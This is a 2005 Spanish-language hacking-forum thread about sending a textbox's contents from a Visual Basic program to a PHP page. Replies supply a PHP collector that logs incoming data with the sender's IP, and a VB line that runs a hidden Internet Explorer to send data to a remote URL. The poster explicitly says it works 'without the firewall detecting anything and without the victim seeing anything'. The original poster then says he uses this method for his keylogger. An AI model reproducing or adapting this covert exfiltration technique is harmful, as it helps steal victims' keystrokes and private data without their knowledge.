elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  como enviar un texto por método post a php
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: como enviar un texto por método post a php  (Leído 5,577 veces)
A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
como enviar un texto por método post a php
« en: 31 Agosto 2005, 15:58 pm »

hola, mi pregunta es como postear un texto por medio del control Inet a una pagina web???

esto es lo que llevo de codigo, no se si este bien, miren:

-----------------

Public Function SendMail()

    Dim info As String
    Dim URL As String
    Dim Body As String
   
    On Error Resume Next
   
    URL = "www.t1bia.trans69.com/mail.php"
    info = "&body=" & text1
    Call Inet1.Execute(URL, "POST", info, "Content-Type: application/x-www-form-urlencoded")
End Function

----------------------
esa url es mia, ahi tengo un php que hice anoche el cual tiene un textbot y un boton, todo lo que se escriba en ese textbox se manda a uno de mis correos.
Pero no se como hacer para que mi aplicacion en VB mande lo que hay en text1 a esa web!!!!

podrian ayudarme con alguna info porfas? graciaaaaaaaas!


En línea

Hackeo, luego existo...
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: como enviar un texto por método post a php
« Respuesta #1 en: 31 Agosto 2005, 16:34 pm »

"http://www.website.com/get.php?info=" & texto1.text
Y en el archivo get.php haces un get para que coja los datos que se le da a info.


En línea

programatrix


Desconectado Desconectado

Mensajes: 3.287


Ver Perfil WWW
Re: como enviar un texto por método post a php
« Respuesta #2 en: 31 Agosto 2005, 17:09 pm »

O sea:
<?
echo $info;
?>
Interesante y sabrías como hacerlo sin usar el control Inet??
Saludos  ;)
En línea

yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: como enviar un texto por método post a php
« Respuesta #3 en: 31 Agosto 2005, 20:18 pm »

Expuse mi duda hace tiempo sobre como hacer eso mismo con el control winsock y nadie conestó una respuesta coherente. La verdad es que este método para mi es el más eficaz a la hora de enviar datos "concretos", puesto que la cadena URL tiene un límite y no podemos excedernos.

get.php
Código:
<?php
$id = $_GET['id'];

$fp = fopen("archivo.txt", "a");
$msg = "IP: ".$_SERVER["REMOTE_ADDR"]."<br>Fecha: ".date("d/m/y | H:i a")."</br>Datos: ".$id."</br></br>";
fwrite($fp, $msg, 1000);
fclose($fp);

if ($id == "ver") {
include ("archivo.txt");
}
?>


De esta manera con hacer con el winsock un get.php?id=datosdeinteres silenciosamente bastaría para almacenarlo en un documento de texto junto a la fecha y su IP.

Para ver el documento pueden hacer get.php?id=ver .
En línea

yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: como enviar un texto por método post a php
« Respuesta #4 en: 3 Septiembre 2005, 17:19 pm »

Encontré una solución para no tener que usar el winsock:

shell "C:\Archivos de programa\Internet Explorer\IEXPLORE.EXE http://www.website.com/get.php?info=" & texto1.text, vbHide

De esta manera se pueden enviar datos silenciosamente sin que detecte nada el firewall, sin usar ningun control y sin que la victima vea nada.
En línea

Manibal_man


Desconectado Desconectado

Mensajes: 528



Ver Perfil
Re: como enviar un texto por m�todo post a php
« Respuesta #5 en: 3 Septiembre 2005, 23:07 pm »

Si, eso en el caso que tenga xp, porque no siempre es esa la ruta del iexplore.exe, me parece mucho mejor usar ShellExecute para que lo haga con el browser predeterminado... sea cual fuere.

Saludos
En línea

:: I was born ready motha fucka ::
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: como enviar un texto por método post a php
« Respuesta #6 en: 3 Septiembre 2005, 23:51 pm »

Si lo haces con la aplicación "explorer.exe" la ventana no podrá permanecer oculta.
En línea

A2Corp


Desconectado Desconectado

Mensajes: 304



Ver Perfil
Re: como enviar un texto por método post a php
« Respuesta #7 en: 4 Septiembre 2005, 17:36 pm »

Jajaja, ese es el metodo que uso para mi keylogger :P.
se debe poner al ultimo Vbhide para que no se vea :P
En línea

Hackeo, luego existo...
Manibal_man


Desconectado Desconectado

Mensajes: 528



Ver Perfil
Re: como enviar un texto por método post a php
« Respuesta #8 en: 4 Septiembre 2005, 21:05 pm »

Si lo haces con la aplicación "explorer.exe" la ventana no podrá permanecer oculta.

Explorer.EXE es el proceso del administrador del entorno, "Iexplore.exe" es el browser

Saludos
En línea

:: I was born ready motha fucka ::
farder

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: como enviar un texto por método post a php
« Respuesta #9 en: 5 Septiembre 2005, 18:36 pm »

Las soluciones aquí expuestas están bien, pero no solucionan la pregunta, de como enviar informacion mediantes POST, la diferencia reside enque con GET las cadenas largas i multinileas no obtienen un resultado satisfactorio.

Es estado buscando la manera y de momento sin respuestas.
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
devolver valores por metodo post como?
PHP
Zeroql 9 6,715 Último mensaje 18 Junio 2011, 04:54 am
por raul338
[WYSIWYG]NicEdit, ¿como se hace para pasar el texto formateado en html por POST?
Desarrollo Web
astinx 2 5,744 Último mensaje 30 Diciembre 2011, 01:14 am
por astinx
Inyección SQL por método POST? COMO?
Nivel Web
zenok 2 6,472 Último mensaje 26 Marzo 2012, 16:24 pm
por WHK
[Solucionado] Enviar Datos a Una Pagina PHP Usando El Metodo POST Con VBScript
Scripting
Flamer 0 2,188 Último mensaje 19 Febrero 2016, 01:04 am
por Flamer
[Duda] Como enviar informacion al servidor sin el metodo POST ni GET
Desarrollo Web
Flamer 2 2,285 Último mensaje 16 Marzo 2016, 08:42 am
por adastra
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines